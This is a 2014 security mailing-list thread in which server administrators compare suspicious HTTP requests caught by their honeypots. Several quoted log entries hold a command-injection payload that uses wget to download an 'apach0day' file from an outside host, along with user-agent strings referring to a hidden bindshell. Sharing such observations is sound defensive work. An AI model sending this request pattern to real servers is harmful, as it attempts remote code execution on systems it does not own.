I got the same on 7 different servers. Plus, I also had this, from the same IP on 25/06 on 3 of my servers:
GET /rutorrent HTTP/1.0 User-Agent: Chrome 14.2.0 Mozilla (Gecko)Accept: */* Bruno On 29 July 2014 08:05, Lutz Schildt <l...@lsmooth.de> wrote: > Am 28.07.2014 21:26, schrieb Lutz Schildt: > > I've seen the same request on one of my honeypots and a second one a few >> hours later from the same IP: >> >> >> GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget >> proxypipe.com/apach0day; >> HTTP/1.0 >> User-agent: chroot-apach0day >> Referrer: /xA/x0a/x06 >> >> _______________________________________________ >> Pauldotcom mailing list >> Pauldotcom@mail.securityweekly.com >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > Another one: > > GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget > proxypipe.com/apach0day; > HTTP/1.0 > User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB > Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > -- - Bruno
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
